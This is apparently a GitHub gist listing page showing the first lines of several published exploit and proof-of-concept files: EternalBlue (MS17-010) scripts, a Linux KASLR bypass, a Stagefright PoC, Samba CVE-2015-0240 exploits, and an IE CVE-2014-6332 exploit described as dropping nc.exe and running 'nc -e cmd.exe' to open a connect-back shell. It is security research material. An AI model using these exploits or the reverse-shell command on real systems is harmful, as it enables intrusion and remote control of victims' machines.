This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import ghidra.program.model.symbol.SourceType | |
import re | |
functionManager = currentProgram.getFunctionManager() | |
#minAddress = currentProgram.getMinAddress() | |
baseAddress = currentProgram.getImageBase() | |
USER_DEFINED = ghidra.program.model.symbol.SourceType.USER_DEFINED |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
This PoC is based on http://www.immunityinc.com/downloads/x86leaks_old.pdf | |
The PoC finds direct physical map and kernel text address in Linux kernel without PTI on Intel x64. | |
The PoC might not work correctly in VM. For example, this PoC cannot find correct direct physical map | |
address in KVM. The reason is in https://www.kernel.org/doc/Documentation/virtual/kvm/mmu.txt | |
$ ./break_linux_kaslr_nopti |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
import sys | |
from struct import pack | |
if len(sys.argv) < 4: | |
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) | |
sys.exit() | |
sc_x86 = open(sys.argv[1], 'rb').read() | |
sc_x64 = open(sys.argv[2], 'rb').read() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb, ntlm | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 7/2008 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c | |
""" | |
from struct import pack | |
def create_box(atom_type, data): | |
return pack("!I", len(data)+4+4) + atom_type + data |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
For anyone want to know what function are patched. | |
Just open patched version and find all functions reference to RtlULongLongAdd(). | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
in libtalloc does not write a value on 'creds' address. | |
Reference: | |
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
This PoC does only triggering the bug | |
Reference: | |
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ | |
################# | |
Exploitability against CentOS/Ubuntu binaries |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
'server_ip' and 'server_port' in javascript below determined the connect back target | |
Tested on | |
- IE11 + Windows 7 64-bit (EPM is off) | |
- IE11 + Windoes 8.1 64-bit (EPM is off) |
NewerOlder